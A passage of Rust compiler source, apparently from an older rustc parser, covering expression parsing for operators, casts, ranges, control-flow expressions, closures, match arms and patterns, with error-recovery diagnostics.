if [token::DotDot, token::DotDotDot, token::DotDotEq].contains(&self.token) {
return self.parse_prefix_range_expr(attrs);
} else {
self.parse_prefix_expr(attrs)?
}
};
match (self.expr_is_complete(&lhs), AssocOp::from_token(&self.token)) {
(true, None) => {
// Semi-statement forms are odd. See https://github.com/rust-lang/rust/issues/29071
return Ok(lhs);
}
(false, _) => {} // continue parsing the expression
// An exhaustive check is done in the following block, but these are checked first
// because they *are* ambiguous but also reasonable looking incorrect syntax, so we
// want to keep their span info to improve diagnostics in these cases in a later stage.
(true, Some(AssocOp::Multiply)) | // `{ 42 } *foo = bar;` or `{ 42 } * 3`
(true, Some(AssocOp::Subtract)) | // `{ 42 } -5`
(true, Some(AssocOp::LAnd)) | // `{ 42 } &&x` (#61475)
(true, Some(AssocOp::Add)) // `{ 42 } + 42
// If the next token is a keyword, then the tokens above *are* unambiguously incorrect:
// `if x { a } else { b } && if y { c } else { d }`
if !self.look_ahead(1, |t| t.is_reserved_ident()) => {
// These cases are ambiguous and can't be identified in the parser alone
let sp = self.sess.source_map().start_point(self.span);
self.sess.ambiguous_block_expr_parse.borrow_mut().insert(sp, lhs.span);
return Ok(lhs);
}
(true, Some(ref op)) if !op.can_continue_expr_unambiguously() => {
return Ok(lhs);
}
(true, Some(_)) => {
// We've found an expression that would be parsed as a statement, but the next
// token implies this should be parsed as an expression.
// For example: `if let Some(x) = x { x } else { 0 } / 2`
let mut err = self.sess.span_diagnostic.struct_span_err(self.span, &format!(
"expected expression, found `{}`",
pprust::token_to_string(&self.token),
));
err.span_label(self.span, "expected expression");
self.sess.expr_parentheses_needed(
&mut err,
lhs.span,
Some(pprust::expr_to_string(&lhs),
));
err.emit();
}
}
self.expected_tokens.push(TokenType::Operator);
while let Some(op) = AssocOp::from_token(&self.token) {
// Adjust the span for interpolated LHS to point to the `$lhs` token and not to what
// it refers to. Interpolated identifiers are unwrapped early and never show up here
// as `PrevTokenKind::Interpolated` so if LHS is a single identifier we always process
// it as "interpolated", it doesn't change the answer for non-interpolated idents.
let lhs_span = match (self.prev_token_kind, &lhs.node) {
(PrevTokenKind::Interpolated, _) => self.prev_span,
(PrevTokenKind::Ident, &ExprKind::Path(None, ref path))
if path.segments.len() == 1 => self.prev_span,
_ => lhs.span,
};
let cur_op_span = self.span;
let restrictions = if op.is_assign_like() {
self.restrictions & Restrictions::NO_STRUCT_LITERAL
} else {
self.restrictions
};
let prec = op.precedence();
if prec < min_prec {
break;
}
// Check for deprecated `...` syntax
if self.token == token::DotDotDot && op == AssocOp::DotDotEq {
self.err_dotdotdot_syntax(self.span);
}
self.bump();
if op.is_comparison() {
self.check_no_chained_comparison(&lhs, &op);
}
// Special cases:
if op == AssocOp::As {
lhs = self.parse_assoc_op_cast(lhs, lhs_span, ExprKind::Cast)?;
continue
} else if op == AssocOp::Colon {
let maybe_path = self.could_ascription_be_path(&lhs.node);
let next_sp = self.span;
lhs = match self.parse_assoc_op_cast(lhs, lhs_span, ExprKind::Type) {
Ok(lhs) => lhs,
Err(mut err) => {
self.bad_type_ascription(
&mut err,
lhs_span,
cur_op_span,
next_sp,
maybe_path,
);
return Err(err);
}
};
continue
} else if op == AssocOp::DotDot || op == AssocOp::DotDotEq {
// If we didn’t have to handle `x..`/`x..=`, it would be pretty easy to
// generalise it to the Fixity::None code.
//
// We have 2 alternatives here: `x..y`/`x..=y` and `x..`/`x..=` The other
// two variants are handled with `parse_prefix_range_expr` call above.
let rhs = if self.is_at_start_of_range_notation_rhs() {
Some(self.parse_assoc_expr_with(prec + 1, LhsExpr::NotYetParsed)?)
} else {
None
};
let (lhs_span, rhs_span) = (lhs.span, if let Some(ref x) = rhs {
x.span
} else {
cur_op_span
});
let limits = if op == AssocOp::DotDot {
RangeLimits::HalfOpen
} else {
RangeLimits::Closed
};
let r = self.mk_range(Some(lhs), rhs, limits)?;
lhs = self.mk_expr(lhs_span.to(rhs_span), r, ThinVec::new());
break
}
let fixity = op.fixity();
let prec_adjustment = match fixity {
Fixity::Right => 0,
Fixity::Left => 1,
// We currently have no non-associative operators that are not handled above by
// the special cases. The code is here only for future convenience.
Fixity::None => 1,
};
let rhs = self.with_res(
restrictions - Restrictions::STMT_EXPR,
|this| this.parse_assoc_expr_with(prec + prec_adjustment, LhsExpr::NotYetParsed)
)?;
// Make sure that the span of the parent node is larger than the span of lhs and rhs,
// including the attributes.
let lhs_span = lhs
.attrs
.iter()
.filter(|a| a.style == AttrStyle::Outer)
.next()
.map_or(lhs_span, |a| a.span);
let span = lhs_span.to(rhs.span);
lhs = match op {
AssocOp::Add | AssocOp::Subtract | AssocOp::Multiply | AssocOp::Divide |
AssocOp::Modulus | AssocOp::LAnd | AssocOp::LOr | AssocOp::BitXor |
AssocOp::BitAnd | AssocOp::BitOr | AssocOp::ShiftLeft | AssocOp::ShiftRight |
AssocOp::Equal | AssocOp::Less | AssocOp::LessEqual | AssocOp::NotEqual |
AssocOp::Greater | AssocOp::GreaterEqual => {
let ast_op = op.to_ast_binop().unwrap();
let binary = self.mk_binary(source_map::respan(cur_op_span, ast_op), lhs, rhs);
self.mk_expr(span, binary, ThinVec::new())
}
AssocOp::Assign => self.mk_expr(span, ExprKind::Assign(lhs, rhs), ThinVec::new()),
AssocOp::AssignOp(k) => {
let aop = match k {
token::Plus => BinOpKind::Add,
token::Minus => BinOpKind::Sub,
token::Star => BinOpKind::Mul,
token::Slash => BinOpKind::Div,
token::Percent => BinOpKind::Rem,
token::Caret => BinOpKind::BitXor,
token::And => BinOpKind::BitAnd,
token::Or => BinOpKind::BitOr,
token::Shl => BinOpKind::Shl,
token::Shr => BinOpKind::Shr,
};
let aopexpr = self.mk_assign_op(source_map::respan(cur_op_span, aop), lhs, rhs);
self.mk_expr(span, aopexpr, ThinVec::new())
}
AssocOp::As | AssocOp::Colon | AssocOp::DotDot | AssocOp::DotDotEq => {
self.bug("AssocOp should have been handled by special case")
}
};
if let Fixity::None = fixity { break }
}
Ok(lhs)
}
fn parse_assoc_op_cast(&mut self, lhs: P<Expr>, lhs_span: Span,
expr_kind: fn(P<Expr>, P<Ty>) -> ExprKind)
-> PResult<'a, P<Expr>> {
let mk_expr = |this: &mut Self, rhs: P<Ty>| {
this.mk_expr(lhs_span.to(rhs.span), expr_kind(lhs, rhs), ThinVec::new())
};
// Save the state of the parser before parsing type normally, in case there is a
// LessThan comparison after this cast.
let parser_snapshot_before_type = self.clone();
match self.parse_ty_no_plus() {
Ok(rhs) => {
Ok(mk_expr(self, rhs))
}
Err(mut type_err) => {
// Rewind to before attempting to parse the type with generics, to recover
// from situations like `x as usize < y` in which we first tried to parse
// `usize < y` as a type with generic arguments.
let parser_snapshot_after_type = self.clone();
mem::replace(self, parser_snapshot_before_type);
match self.parse_path(PathStyle::Expr) {
Ok(path) => {
let (op_noun, op_verb) = match self.token {
token::Lt => ("comparison", "comparing"),
token::BinOp(token::Shl) => ("shift", "shifting"),
_ => {
// We can end up here even without `<` being the next token, for
// example because `parse_ty_no_plus` returns `Err` on keywords,
// but `parse_path` returns `Ok` on them due to error recovery.
// Return original error and parser state.
mem::replace(self, parser_snapshot_after_type);
return Err(type_err);
}
};
// Successfully parsed the type path leaving a `<` yet to parse.
type_err.cancel();
// Report non-fatal diagnostics, keep `x as usize` as an expression
// in AST and continue parsing.
let msg = format!("`<` is interpreted as a start of generic \
arguments for `{}`, not a {}", path, op_noun);
let mut err = self.sess.span_diagnostic.struct_span_err(self.span, &msg);
err.span_label(self.look_ahead_span(1).to(parser_snapshot_after_type.span),
"interpreted as generic arguments");
err.span_label(self.span, format!("not interpreted as {}", op_noun));
let expr = mk_expr(self, P(Ty {
span: path.span,
node: TyKind::Path(None, path),
id: ast::DUMMY_NODE_ID
}));
let expr_str = self.sess.source_map().span_to_snippet(expr.span)
.unwrap_or_else(|_| pprust::expr_to_string(&expr));
err.span_suggestion(
expr.span,
&format!("try {} the cast value", op_verb),
format!("({})", expr_str),
Applicability::MachineApplicable
);
err.emit();
Ok(expr)
}
Err(mut path_err) => {
// Couldn't parse as a path, return original error and parser state.
path_err.cancel();
mem::replace(self, parser_snapshot_after_type);
Err(type_err)
}
}
}
}
}
/// Parse prefix-forms of range notation: `..expr`, `..`, `..=expr`
fn parse_prefix_range_expr(&mut self,
already_parsed_attrs: Option<ThinVec<Attribute>>)
-> PResult<'a, P<Expr>> {
// Check for deprecated `...` syntax
if self.token == token::DotDotDot {
self.err_dotdotdot_syntax(self.span);
}
debug_assert!([token::DotDot, token::DotDotDot, token::DotDotEq].contains(&self.token),
"parse_prefix_range_expr: token {:?} is not DotDot/DotDotEq",
self.token);
let tok = self.token.clone();
let attrs = self.parse_or_use_outer_attributes(already_parsed_attrs)?;
let lo = self.span;
let mut hi = self.span;
self.bump();
let opt_end = if self.is_at_start_of_range_notation_rhs() {
// RHS must be parsed with more associativity than the dots.
let next_prec = AssocOp::from_token(&tok).unwrap().precedence() + 1;
Some(self.parse_assoc_expr_with(next_prec,
LhsExpr::NotYetParsed)
.map(|x|{
hi = x.span;
x
})?)
} else {
None
};
let limits = if tok == token::DotDot {
RangeLimits::HalfOpen
} else {
RangeLimits::Closed
};
let r = self.mk_range(None, opt_end, limits)?;
Ok(self.mk_expr(lo.to(hi), r, attrs))
}
fn is_at_start_of_range_notation_rhs(&self) -> bool {
if self.token.can_begin_expr() {
// parse `for i in 1.. { }` as infinite loop, not as `for i in (1..{})`.
if self.token == token::OpenDelim(token::Brace) {
return !self.restrictions.contains(Restrictions::NO_STRUCT_LITERAL);
}
true
} else {
false
}
}
/// Parses an `if` or `if let` expression (`if` token already eaten).
fn parse_if_expr(&mut self, attrs: ThinVec<Attribute>) -> PResult<'a, P<Expr>> {
if self.check_keyword(kw::Let) {
return self.parse_if_let_expr(attrs);
}
let lo = self.prev_span;
let cond = self.parse_expr_res(Restrictions::NO_STRUCT_LITERAL, None)?;
// Verify that the parsed `if` condition makes sense as a condition. If it is a block, then
// verify that the last statement is either an implicit return (no `;`) or an explicit
// return. This won't catch blocks with an explicit `return`, but that would be caught by
// the dead code lint.
if self.eat_keyword(kw::Else) || !cond.returns() {
let sp = self.sess.source_map().next_point(lo);
let mut err = self.diagnostic()
.struct_span_err(sp, "missing condition for `if` statemement");
err.span_label(sp, "expected if condition here");
return Err(err)
}
let not_block = self.token != token::OpenDelim(token::Brace);
let thn = self.parse_block().map_err(|mut err| {
if not_block {
err.span_label(lo, "this `if` statement has a condition, but no block");
}
err
})?;
let mut els: Option<P<Expr>> = None;
let mut hi = thn.span;
if self.eat_keyword(kw::Else) {
let elexpr = self.parse_else_expr()?;
hi = elexpr.span;
els = Some(elexpr);
}
Ok(self.mk_expr(lo.to(hi), ExprKind::If(cond, thn, els), attrs))
}
/// Parses an `if let` expression (`if` token already eaten).
fn parse_if_let_expr(&mut self, attrs: ThinVec<Attribute>)
-> PResult<'a, P<Expr>> {
let lo = self.prev_span;
self.expect_keyword(kw::Let)?;
let pats = self.parse_pats()?;
self.expect(&token::Eq)?;
let expr = self.parse_expr_res(Restrictions::NO_STRUCT_LITERAL, None)?;
let thn = self.parse_block()?;
let (hi, els) = if self.eat_keyword(kw::Else) {
let expr = self.parse_else_expr()?;
(expr.span, Some(expr))
} else {
(thn.span, None)
};
Ok(self.mk_expr(lo.to(hi), ExprKind::IfLet(pats, expr, thn, els), attrs))
}
/// Parses `move |args| expr`.
fn parse_lambda_expr(&mut self,
attrs: ThinVec<Attribute>)
-> PResult<'a, P<Expr>>
{
let lo = self.span;
let movability = if self.eat_keyword(kw::Static) {
Movability::Static
} else {
Movability::Movable
};
let asyncness = if self.span.rust_2018() {
self.parse_asyncness()
} else {
IsAsync::NotAsync
};
let capture_clause = if self.eat_keyword(kw::Move) {
CaptureBy::Value
} else {
CaptureBy::Ref
};
let decl = self.parse_fn_block_decl()?;
let decl_hi = self.prev_span;
let body = match decl.output {
FunctionRetTy::Default(_) => {
let restrictions = self.restrictions - Restrictions::STMT_EXPR;
self.parse_expr_res(restrictions, None)?
},
_ => {
// If an explicit return type is given, require a
// block to appear (RFC 968).
let body_lo = self.span;
self.parse_block_expr(None, body_lo, BlockCheckMode::Default, ThinVec::new())?
}
};
Ok(self.mk_expr(
lo.to(body.span),
ExprKind::Closure(capture_clause, asyncness, movability, decl, body, lo.to(decl_hi)),
attrs))
}
// `else` token already eaten
fn parse_else_expr(&mut self) -> PResult<'a, P<Expr>> {
if self.eat_keyword(kw::If) {
return self.parse_if_expr(ThinVec::new());
} else {
let blk = self.parse_block()?;
return Ok(self.mk_expr(blk.span, ExprKind::Block(blk, None), ThinVec::new()));
}
}
/// Parse a 'for' .. 'in' expression ('for' token already eaten)
fn parse_for_expr(&mut self, opt_label: Option<Label>,
span_lo: Span,
mut attrs: ThinVec<Attribute>) -> PResult<'a, P<Expr>> {
// Parse: `for <src_pat> in <src_expr> <src_loop_block>`
let pat = self.parse_top_level_pat()?;
if !self.eat_keyword(kw::In) {
let in_span = self.prev_span.between(self.span);
let mut err = self.sess.span_diagnostic
.struct_span_err(in_span, "missing `in` in `for` loop");
err.span_suggestion_short(
in_span, "try adding `in` here", " in ".into(),
// has been misleading, at least in the past (closed Issue #48492)
Applicability::MaybeIncorrect
);
err.emit();
}
let in_span = self.prev_span;
self.check_for_for_in_in_typo(in_span);
let expr = self.parse_expr_res(Restrictions::NO_STRUCT_LITERAL, None)?;
let (iattrs, loop_block) = self.parse_inner_attrs_and_block()?;
attrs.extend(iattrs);
let hi = self.prev_span;
Ok(self.mk_expr(span_lo.to(hi), ExprKind::ForLoop(pat, expr, loop_block, opt_label), attrs))
}
/// Parses a `while` or `while let` expression (`while` token already eaten).
fn parse_while_expr(&mut self, opt_label: Option<Label>,
span_lo: Span,
mut attrs: ThinVec<Attribute>) -> PResult<'a, P<Expr>> {
if self.token.is_keyword(kw::Let) {
return self.parse_while_let_expr(opt_label, span_lo, attrs);
}
let cond = self.parse_expr_res(Restrictions::NO_STRUCT_LITERAL, None)?;
let (iattrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(iattrs);
let span = span_lo.to(body.span);
return Ok(self.mk_expr(span, ExprKind::While(cond, body, opt_label), attrs));
}
/// Parses a `while let` expression (`while` token already eaten).
fn parse_while_let_expr(&mut self, opt_label: Option<Label>,
span_lo: Span,
mut attrs: ThinVec<Attribute>) -> PResult<'a, P<Expr>> {
self.expect_keyword(kw::Let)?;
let pats = self.parse_pats()?;
self.expect(&token::Eq)?;
let expr = self.parse_expr_res(Restrictions::NO_STRUCT_LITERAL, None)?;
let (iattrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(iattrs);
let span = span_lo.to(body.span);
return Ok(self.mk_expr(span, ExprKind::WhileLet(pats, expr, body, opt_label), attrs));
}
// parse `loop {...}`, `loop` token already eaten
fn parse_loop_expr(&mut self, opt_label: Option<Label>,
span_lo: Span,
mut attrs: ThinVec<Attribute>) -> PResult<'a, P<Expr>> {
let (iattrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(iattrs);
let span = span_lo.to(body.span);
Ok(self.mk_expr(span, ExprKind::Loop(body, opt_label), attrs))
}
/// Parses an `async move {...}` expression.
pub fn parse_async_block(&mut self, mut attrs: ThinVec<Attribute>)
-> PResult<'a, P<Expr>>
{
let span_lo = self.span;
self.expect_keyword(kw::Async)?;
let capture_clause = if self.eat_keyword(kw::Move) {
CaptureBy::Value
} else {
CaptureBy::Ref
};
let (iattrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(iattrs);
Ok(self.mk_expr(
span_lo.to(body.span),
ExprKind::Async(capture_clause, ast::DUMMY_NODE_ID, body), attrs))
}
/// Parses a `try {...}` expression (`try` token already eaten).
fn parse_try_block(&mut self, span_lo: Span, mut attrs: ThinVec<Attribute>)
-> PResult<'a, P<Expr>>
{
let (iattrs, body) = self.parse_inner_attrs_and_block()?;
attrs.extend(iattrs);
if self.eat_keyword(kw::Catch) {
let mut error = self.struct_span_err(self.prev_span,
"keyword `catch` cannot follow a `try` block");
error.help("try using `match` on the result of the `try` block instead");
error.emit();
Err(error)
} else {
Ok(self.mk_expr(span_lo.to(body.span), ExprKind::TryBlock(body), attrs))
}
}
// `match` token already eaten
fn parse_match_expr(&mut self, mut attrs: ThinVec<Attribute>) -> PResult<'a, P<Expr>> {
let match_span = self.prev_span;
let lo = self.prev_span;
let discriminant = self.parse_expr_res(Restrictions::NO_STRUCT_LITERAL,
None)?;
if let Err(mut e) = self.expect(&token::OpenDelim(token::Brace)) {
if self.token == token::Token::Semi {
e.span_suggestion_short(
match_span,
"try removing this `match`",
String::new(),
Applicability::MaybeIncorrect // speculative
);
}
return Err(e)
}
attrs.extend(self.parse_inner_attributes()?);
let mut arms: Vec<Arm> = Vec::new();
while self.token != token::CloseDelim(token::Brace) {
match self.parse_arm() {
Ok(arm) => arms.push(arm),
Err(mut e) => {
// Recover by skipping to the end of the block.
e.emit();
self.recover_stmt();
let span = lo.to(self.span);
if self.token == token::CloseDelim(token::Brace) {
self.bump();
}
return Ok(self.mk_expr(span, ExprKind::Match(discriminant, arms), attrs));
}
}
}
let hi = self.span;
self.bump();
return Ok(self.mk_expr(lo.to(hi), ExprKind::Match(discriminant, arms), attrs));
}
crate fn parse_arm(&mut self) -> PResult<'a, Arm> {
let attrs = self.parse_outer_attributes()?;
let lo = self.span;
let pats = self.parse_pats()?;
let guard = if self.eat_keyword(kw::If) {
Some(Guard::If(self.parse_expr()?))
} else {
None
};
let arrow_span = self.span;
self.expect(&token::FatArrow)?;
let arm_start_span = self.span;
let expr = self.parse_expr_res(Restrictions::STMT_EXPR, None)
.map_err(|mut err| {
err.span_label(arrow_span, "while parsing the `match` arm starting here");
err
})?;
let require_comma = classify::expr_requires_semi_to_be_stmt(&expr)
&& self.token != token::CloseDelim(token::Brace);
let hi = self.span;
if require_comma {
let cm = self.sess.source_map();
self.expect_one_of(&[token::Comma], &[token::CloseDelim(token::Brace)])
.map_err(|mut err| {
match (cm.span_to_lines(expr.span), cm.span_to_lines(arm_start_span)) {
(Ok(ref expr_lines), Ok(ref arm_start_lines))
if arm_start_lines.lines[0].end_col == expr_lines.lines[0].end_col
&& expr_lines.lines.len() == 2
&& self.token == token::FatArrow => {
// We check whether there's any trailing code in the parse span,
// if there isn't, we very likely have the following:
//
// X | &Y => "y"
// | -- - missing comma
// | |
// | arrow_span
// X | &X => "x"
// | - ^^ self.span
// | |
// | parsed until here as `"y" & X`
err.span_suggestion_short(
cm.next_point(arm_start_span),
"missing a comma here to end this `match` arm",
",".to_owned(),
Applicability::MachineApplicable
);
}
_ => {
err.span_label(arrow_span,
"while parsing the `match` arm starting here");
}
}
err
})?;
} else {
self.eat(&token::Comma);
}
Ok(ast::Arm {
attrs,
pats,
guard,
body: expr,
span: lo.to(hi),
})
}
/// Parses an expression.
#[inline]
pub fn parse_expr(&mut self) -> PResult<'a, P<Expr>> {
self.parse_expr_res(Restrictions::empty(), None)
}
/// Evaluates the closure with restrictions in place.
///
/// Afters the closure is evaluated, restrictions are reset.
fn with_res<F, T>(&mut self, r: Restrictions, f: F) -> T
where F: FnOnce(&mut Self) -> T
{
let old = self.restrictions;
self.restrictions = r;
let r = f(self);
self.restrictions = old;
return r;
}
/// Parses an expression, subject to the given restrictions.
#[inline]
fn parse_expr_res(&mut self, r: Restrictions,
already_parsed_attrs: Option<ThinVec<Attribute>>)
-> PResult<'a, P<Expr>> {
self.with_res(r, |this| this.parse_assoc_expr(already_parsed_attrs))
}
/// Parses the RHS of a local variable declaration (e.g., '= 14;').
fn parse_initializer(&mut self, skip_eq: bool) -> PResult<'a, Option<P<Expr>>> {
if self.eat(&token::Eq) {
Ok(Some(self.parse_expr()?))
} else if skip_eq {
Ok(Some(self.parse_expr()?))
} else {
Ok(None)
}
}
/// Parses patterns, separated by '|' s.
fn parse_pats(&mut self) -> PResult<'a, Vec<P<Pat>>> {
// Allow a '|' before the pats (RFC 1925 + RFC 2530)
self.eat(&token::BinOp(token::Or));
let mut pats = Vec::new();
loop {
pats.push(self.parse_top_level_pat()?);
if self.token == token::OrOr {
let mut err = self.struct_span_err(self.span,
"unexpected token `||` after pattern");
err.span_suggestion(
self.span,
"use a single `|` to specify multiple patterns",
"|".to_owned(),
Applicability::MachineApplicable
);
err.emit();
self.bump();
} else if self.eat(&token::BinOp(token::Or)) {
// This is a No-op. Continue the loop to parse the next
// pattern.
} else {
return Ok(pats);
}
};
}
// Parses a parenthesized list of patterns like
// `()`, `(p)`, `(p,)`, `(p, q)`, or `(p, .., q)`. Returns:
// - a vector of the patterns that were parsed
// - an option indicating the index of the `..` element
// - a boolean indicating whether a trailing comma was present.
// Trailing commas are significant because (p) and (p,) are different patterns.
fn parse_parenthesized_pat_list(&mut self) -> PResult<'a, (Vec<P<Pat>>, Option<usize>, bool)> {
self.expect(&token::OpenDelim(token::Paren))?;
let result = match self.parse_pat_list() {
Ok(result) => result,
Err(mut err) => { // recover from parse error in tuple pattern list
err.emit();
self.consume_block(token::Paren);
return Ok((vec![], Some(0), false));
}
};
self.expect(&token::CloseDelim(token::Paren))?;
Ok(result)
}
fn parse_pat_list(&mut self) -> PResult<'a, (Vec<P<Pat>>, Option<usize>, bool)> {
let mut fields = Vec::new();
let mut ddpos = None;
let mut prev_dd_sp = None;
let mut trailing_comma = false;
loop {
if self.eat(&token::DotDot) {
if ddpos.is_none() {
ddpos = Some(fields.len());
prev_dd_sp = Some(self.prev_span);
} else {
// Emit a friendly error, ignore `..` and continue parsing
let mut err = self.struct_span_err(
self.prev_span,
"`..` can only be used once per tuple or tuple struct pattern",
);
err.span_label(self.prev_span, "can only be used once per pattern");
if let Some(sp) = prev_dd_sp {
err.span_label(sp, "previously present here");
}
err.emit();
}
} else if !self.check(&token::CloseDelim(token::Paren)) {
fields.push(self.parse_pat(None)?);
} else {
break
}
trailing_comma = self.eat(&token::Comma);
if !trailing_comma {
break
}
}
if ddpos == Some(fields.len()) && trailing_comma {
// `..` needs to be followed by `)` or `, pat`, `..,)` is disallowed.
let msg = "trailing comma is not permitted after `..`";
self.struct_span_err(self.prev_span, msg)
.span_label(self.prev_span, msg)
.emit();
}
Ok((fields, ddpos, trailing_comma))
}
fn parse_pat_vec_elements(
&mut self,
) -> PResult<'a, (Vec<P<Pat>>, Option<P<Pat>>, Vec<P<Pat>>)> {
let mut before = Vec::new();
let mut slice = None;
let mut after = Vec::new();
let mut first = true;
let mut before_slice = true;
while self.token != token::CloseDelim(token::Bracket) {
if first {
first = false;
} else {
self.expect(&token::Comma)?;
if self.token == token::CloseDelim(token::Bracket)
&& (before_slice || !after.is_empty()) {
break
}
}
if before_slice {
if self.eat(&token::DotDot) {
if self.check(&token::Comma) ||
self.check(&token::CloseDelim(token::Bracket)) {
slice = Some(P(Pat {
id: ast::DUMMY_NODE_ID,
node: PatKind::Wild,
span: self.prev_span,
}));
before_slice = false;
}
continue
}
}
let subpat = self.parse_pat(None)?;
if before_slice && self.eat(&token::DotDot) {
slice = Some(subpat);
before_slice = false;
} else if before_slice {
before.push(subpat);
} else {
after.push(subpat);
}
}
Ok((before, slice, after))
}
fn parse_pat_field(
&mut self,
lo: Span,
attrs: Vec<Attribute>
) -> PResult<'a, source_map::Spanned<ast::FieldPat>> {
// Check if a colon exists one ahead. This means we're parsing a fieldname.
let hi;
let (subpat, fieldname, is_shorthand) = if self.look_ahead(1, |t| t == &token::Colon) {
// Parsing a pattern of the form "fieldname: pat"
let fieldname = self.parse_field_name()?;
self.bump();
let pat = self.parse_pat(None)?;
hi = pat.span;
(pat, fieldname, false)
} else {
// Parsing a pattern of the form "(box) (ref) (mut) fieldname"
let is_box = self.eat_keyword(kw::Box);
let boxed_span = self.span;
let is_ref = self.eat_keyword(kw::Ref);
let is_mut = self.eat_keyword(kw::Mut);
let fieldname = self.parse_ident()?;
hi = self.prev_span;
let bind_type = match (is_ref, is_mut) {
(true, true) => BindingMode::ByRef(Mutability::Mutable),
(true, false) => BindingMode::ByRef(Mutability::Immutable),
(false, true) => BindingMode::ByValue(Mutability::Mutable),
(false, false) => BindingMode::ByValue(Mutability::Immutable),
};
let fieldpat = P(Pat {
id: ast::DUMMY_NODE_ID,
node: PatKind::Ident(bind_type, fieldname, None),
span: boxed_span.to(hi),
});
let subpat = if is_box {
P(Pat {
id: ast::DUMMY_NODE_ID,
node: PatKind::Box(fieldpat),
span: lo.to(hi),
})
} else {
fieldpat
};
(subpat, fieldname, true)
};
Ok(source_map::Spanned {
span: lo.to(hi),
node: ast::FieldPat {
ident: fieldname,
pat: subpat,
is_shorthand,
attrs: attrs.into(),
}
})
}
/// Parses the fields of a struct-like pattern.
fn parse_pat_fields(&mut self) -> PResult<'a, (Vec<source_map::Spanned<ast::FieldPat>>, bool)> {
let mut fields = Vec::new();
let mut etc = false;
let mut ate_comma = true;
let mut delayed_err: Option<DiagnosticBuilder<'a>> = None;
let mut etc_span = None;
while self.token != token::CloseDelim(token::Brace) {
let attrs = self.parse_outer_attributes()?;
let lo = self.span;
// check that a comma comes after every field
if !ate_comma {
let err = self.struct_span_err(self.prev_span, "expected `,`");
if let Some(mut delayed) = delayed_err {
delayed.emit();
}
return Err(err);
}
ate_comma = false;
if self.check(&token::DotDot) || self.token == token::DotDotDot {
etc = true;
let mut etc_sp = self.span;
if self.token == token::DotDotDot { // Issue #46718
// Accept `...` as if it were `..` to avoid further errors
let mut err = self.struct_span_err(self.span,
"expected field pattern, found `...`");
err.span_suggestion(
self.span,
"to omit remaining fields, use one fewer `.`",
"..".to_owned(),
Applicability::MachineApplicable
);
err.emit();
}
self.bump(); // `..` || `...`
if self.token == token::CloseDelim(token::Brace) {
etc_span = Some(etc_sp);
break;
}
let token_str = self.this_token_descr();
let mut err = self.fatal(&format!("expected `}}`, found {}", token_str));
err.span_label(self.span, "expected `}`");
let mut comma_sp = None;
if self.token == token::Comma { // Issue #49257
etc_sp = etc_sp.to(self.sess.source_map().span_until_non_whitespace(self.span));
err.span_label(etc_sp,
"`..` must be at the end and cannot have a trailing comma");
comma_sp = Some(self.span);
self.bump();
ate_comma = true;
}
etc_span = Some(etc_sp.until(self.span));
if self.token == token::CloseDelim(token::Brace) {
// If the struct looks otherwise well formed, recover and continue.
if let Some(sp) = comma_sp {
err.span_suggestion_short(
sp,
"remove this comma",
String::new(),
Applicability::MachineApplicable,
);
}
err.emit();
break;
} else if self.token.is_ident() && ate_comma {
// Accept fields coming after `..,`.
// This way we avoid "pattern missing fields" errors afterwards.
// We delay this error until the end in order to have a span for a
// suggested fix.
if let Some(mut delayed_err) = delayed_err {
delayed_err.emit();
return Err(err);
} else {
delayed_err = Some(err);
}
} else {
if let Some(mut err) = delayed_err {
err.emit();
}
return Err(err);
}
}
fields.push(match self.parse_pat_field(lo, attrs) {
Ok(field) => field,
Err(err) => {
if let Some(mut delayed_err) = delayed_err {
delayed_err.emit();
}
return Err(err);
}
});
ate_comma = self.eat(&token::Comma);
}
if let Some(mut err) = delayed_err {
if let Some(etc_span) = etc_span {
err.multipart_suggestion(
"move the `..` to the end of the field list",
vec![
(etc_span, String::new()),
(self.span, format!("{}.. }}", if ate_comma { "" } else { ", " })),
],
Applicability::MachineApplicable,
);
}
err.emit();
}
return Ok((fields, etc));
}
fn parse_pat_range_end(&mut self) -> PResult<'a, P<Expr>> {
if self.token.is_path_start() {
let lo = self.span;
let (qself, path) = if self.eat_lt() {
// Parse a qualified path
let (qself, path) = self.parse_qpath(PathStyle::Expr)?;
(Some(qself), path)
} else {
// Parse an unqualified path
(None, self.parse_path(PathStyle::Expr)?)
};
let hi = self.prev_span;
Ok(self.mk_expr(lo.to(hi), ExprKind::Path(qself, path), ThinVec::new()))
} else {
self.parse_literal_maybe_minus()
}
}
// helper function to decide whether to parse as ident binding or to try to do
// something more complex like range patterns
fn parse_as_ident(&mut self) -> bool {
self.look_ahead(1, |t| match *t {
token::OpenDelim(token::Paren) | token::OpenDelim(token::Brace) |
token::DotDotDot | token::DotDotEq | token::ModSep | token::Not => Some(false),
// ensure slice patterns [a, b.., c] and [a, b, c..] don't go into the
// range pattern branch
token::DotDot => None,
_ => Some(true),
}).unwrap_or_else(|| self.look_ahead(2, |t| match *t {
token::Comma | token::CloseDelim(token::Bracket) => true,
_ => false,
}))
}
/// A wrapper around `parse_pat` with some special error handling for the
/// "top-level" patterns in a match arm, `for` loop, `let`, &c. (in contrast
/// to subpatterns within such).
fn parse_top_level_pat(&mut self) -> PResult<'a, P<Pat>> {
let pat = self.parse_pat(None)?;
if self.token == token::Comma {
// An unexpected comma after a top-level pattern is a clue that the
// user (perhaps more accustomed to some other language) forgot the
// parentheses in what should have been a tuple pattern; return a
// suggestion-enhanced error here rather than choking on the comma
// later.
let comma_span = self.span;
self.bump();
if let Err(mut err) = self.parse_pat_list() {
// We didn't expect this to work anyway; we just wanted
// to advance to the end of the comma-sequence so we know
// the span to suggest parenthesizing
err.cancel();
}
let seq_span = pat.span.to(self.prev_span);
let mut err = self.struct_span_err(comma_span,
"unexpected `,` in pattern");
if let Ok(seq_snippet) = self.sess.source_map().span_to_snippet(seq_span) {
err.span_suggestion(
seq_span,
"try adding parentheses to match on a tuple..",
format!("({})", seq_snippet),
Applicability::MachineApplicable
).span_suggestion(
seq_span,
"..or a vertical bar to match on multiple alternatives",
format!("{}", seq_snippet.replace(",", " |")),
Applicability::MachineApplicable
);
}
return Err(err);
}
Ok(pat)
}
/// Parses a pattern.
pub fn parse_pat(&mut self, expected: Option<&'static str>) -> PResult<'a, P<Pat>> {
self.parse_pat_with_range_pat(true, expected)
}
/// Parses a pattern, with a setting whether modern range patterns (e.g., `a..=b`, `a..b` are
/// allowed).
fn parse_pat_with_range_pat(
&mut self,
allow_range_pat: bool,
expected: Option<&'static str>,
